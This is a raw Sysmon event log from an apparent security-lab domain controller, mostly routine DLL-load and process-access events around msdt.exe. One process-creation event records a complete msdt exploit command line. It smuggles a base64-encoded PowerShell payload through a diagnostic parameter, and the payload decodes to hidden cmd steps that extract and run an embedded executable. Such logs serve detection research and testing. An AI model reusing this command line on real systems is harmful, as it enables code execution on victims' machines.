734700x800000000000000099106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160,IMPHASH=3C09BDCE2388320645D7656AE2AC744CtrueMicrosoft WindowsValid 734700x800000000000000099105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92,IMPHASH=9F3DE8492A7F075320A36332ACC9CAAFtrueMicrosoft WindowsValid 734700x800000000000000099103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575,IMPHASH=CBD4A2FD581B65B4B1934DA291FA2B86trueMicrosoft WindowsValid 734700x800000000000000099102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\windows.storage.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=92988D33BA5299F42B23A1A69000FE4F,SHA256=C79560448589DB04ABB617D9FCA27D4C8E229F344BDCA937322BA8C3E7DBDD53,IMPHASH=A03B8A6BEC68C432E677F3D5E1DA4FAFtrueMicrosoft WindowsValid 734700x800000000000000099098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704,IMPHASH=1835EBC72F9ADB09C6FCFABC04AC9C89trueMicrosoft WindowsValid 734700x800000000000000099097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\shell32.dll10.0.14393.5125 (rs1_release.220429-1732)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F6FECBE8E5C78CD1621E3FF94040AC88,SHA256=128677FA3B8E693EB1C71D455A574CAFB3A0BB688FA1F813F17E476098C59C77,IMPHASH=0DFD49B61B099EE341A0B3D9B49EE90DtrueMicrosoft WindowsValid 734700x800000000000000099096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exeMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35trueMicrosoft WindowsValid 10341000x800000000000000099084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A43E-6294-D800-000000005502}28842488C:\Windows\system32\csrss.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-AAC7-6294-6108-000000005502}54885948C:\Windows\system32\cmd.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x800000000000000099078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.315{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exe"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=calc IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{326FD73D-A440-6294-2753-0E0000000000}0xe53272HighMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon" 23542300x800000000000000099077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.031{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FD764CDF4F4F1DEF7058465FD4E4C5,SHA256=E34517270AFCC7275E0662103FB3BBFB37AA3D54034F5C6C8BED027ADDE91459,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:32.068{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53329-false10.0.1.12-8000- 23542300x800000000000000099153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:35.391{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CADFC3628353B57B35E446EACE6DE186,SHA256=8E347C6246DFC358D94AB89A1D289DC789C3EA26D40F6238FE9B2125693400DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:35.172{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A4CC3B9560E774A5FE527320891D3CD,SHA256=FAE6382C7E816C6E0EB9F0511E8517EDB5F91EE652D885A501E595DBE6CA9420,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:36.266{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A06F426487A207263FAF0F16AFCA2A,SHA256=AAD41A3192B49F7047E4622BD705C74C3BD98DBA6E93338FADC0F711B44B45A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.359{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D70F0C45744604BF5D629216BB88D560,SHA256=1277BC1EF1A983D9CFB6D54E4E22C21A7B25FA0242A8580A40ED312154C7CC56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.047{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:37.031{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.031{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.031{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msxml6.dll6.30.14393.5006MSXML 6.0Microsoft XML Core ServicesMicrosoft 
